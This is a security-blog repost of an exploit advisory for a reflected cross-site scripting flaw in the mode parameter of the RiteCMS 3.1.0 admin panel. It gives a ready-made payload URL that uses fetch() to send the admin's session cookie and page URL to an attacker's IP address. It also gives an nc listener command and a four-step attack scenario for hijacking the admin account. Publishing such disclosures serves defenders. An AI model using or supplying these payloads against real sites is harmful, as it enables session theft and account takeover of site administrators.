Latest Tech

Latest Posts

RiteCMS 3.1.0 Cross Site Scripting

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 127
RiteCMS 3.1.0 Cross Site Scripting
RiteCMS 3.1.0 Cross Site Scripting
## Exploit Title: RiteCMS 3.1.0 - Reflected XSS in Admin ## Exploit Title: RiteCMS 3.1.0 - Reflected XSS in Admin Panel
## Date: October 28, 2025
## Exploit Author: Chokri Hammedi
## Vendor Homepage: https://ritecms.com/
## Software Link: https://github.com/ritecms/ritecms
## Version: RiteCMS 3.1.0
## Tested on: windows xp

## Vulnerability Description:
Reflected Cross-Site Scripting (XSS) vulnerability in the `mode` parameter
of the admin panel allows attackers to steal admin session cookies and
compromise the admin account.

## Proof of Concept:

### Alert Proof of Concept:
```http
http://ritecms.local/admin.php?mode=');alert('XSS');//
```

### Cookie Stealing Payload:
```http
http://ritecms.local/admin.php?mode=');fetch('http://192.168.1.103:8082/steal
',{method:'POST',body:JSON.stringify({cookie:document.cookie,url:window.location.href})});//
```

## Attack Scenario:
1. Attacker sets up listener: `nc -lvnp 8082`
2. Attacker sends malicious link to admin
3. Admin clicks link, session cookie is sent to attacker
4. Attacker uses stolen session to gain admin access

Information Security

Social Media Share
About Contact Terms of Use Privacy Policy
© Khalil Shreateh — Cybersecurity Researcher & White-Hat Hacker — Palestine 🇵🇸
All content is for educational purposes only. Unauthorized use of any information on this site is strictly prohibited.